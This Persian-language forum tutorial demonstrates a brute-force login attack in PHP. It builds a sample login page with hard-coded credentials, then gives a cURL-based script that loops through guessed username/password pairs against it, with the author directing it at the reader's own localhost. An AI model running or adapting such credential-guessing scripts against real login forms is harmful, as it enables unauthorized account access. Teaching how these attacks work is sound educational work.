با سلام
طبق قولی که به یکی از کاربران داده بودم این نوع حمله رو به همراه اسکریپت و بصورت عملی توضیح میدم
توضیح اجمالی: bruteforce به معنای آزمون خطاست و در حمله به سایت ها یعنی اینقدر یوزر پس چک میکنیم تا درست از آب در بیاد.
نکته: تمامی فایلهایی که اینجا گفته میشه رو تو یه فولدر بریزین.
ابتدا صفحه ای به اسم login-attack.php ایجاد کنید و کد زیر را در آن قرار دهید:
کد PHP:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Hello!</title>
</head>
<body>
<?php
if(isset($_POST['submit'])){
if($_POST['username'] == 'mohsen' && $_POST['pass'] == 'soltani'){
echo 'yes';
}else{
echo 'no';
}
}
?>
<form name="frm1" action="login-attack.php" method="post">
username:<input type="textbox" name="username" /><br />
password:<input type="password" name="pass" /><br />
<input type="submit" name="submit" Value="login" />
</form>
</body>
</html>
این کد یک صفحه لاگینه که قراره بهش حمله کنیم
اسکریپت حمله:
از CURL استفاده میکنیم، برای راحتی کار توابع CURL رو در یک فایل جدا قرار میدیم و include میکنیم پس یک فایل به اسم brute_attack.php ایجاد کنید و کدهای زیر را در آن قرار دهید:
کد PHP:
<?php
function attack($url,$post){
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$res = curl_exec($ch);
curl_close($ch);
return $res;
}
?>
حالا یک فایل دیگر به اسم master-attack.php رو ایجاد میکنیم و کدهای زیر را در آن قرار میدهیم:
کد PHP:
<?php
include("brute-attack.php");
$url = "Your-address";
@apache_setenv('no-gzip', 1);
@ini_set('zlib.output_compression', 0);
@ini_set('implicit_flush', 1);
for ($i = 0; $i < 12; $i++) {
$user .= '1';
$pass .= '1';
$post = "submit=submit&username=$user&pass=$pass";
echo "with : username='$user' password='$pass' ===>result : ".(strpos(attack($url,$post),'yes') > 1 ? 'yes' : 'no')."<br />";
ob_end_flush();
sleep(1);
}
ob_implicit_flush(1);
?>
جای your-address آدرس اونجایی که login-attack.php در لوکال هاستتون هست رو قرار بدین، حالا master-attack.php رو اجرا کنید.
این اسکریپت 12 بار یوزر پس را چک میکنه و ریزالت را بهتون نشون میده
در پست بعدی خط به خط مواردو توضیح میدم.
موضوعات مشابه:
علاقه مندی ها (Bookmarks)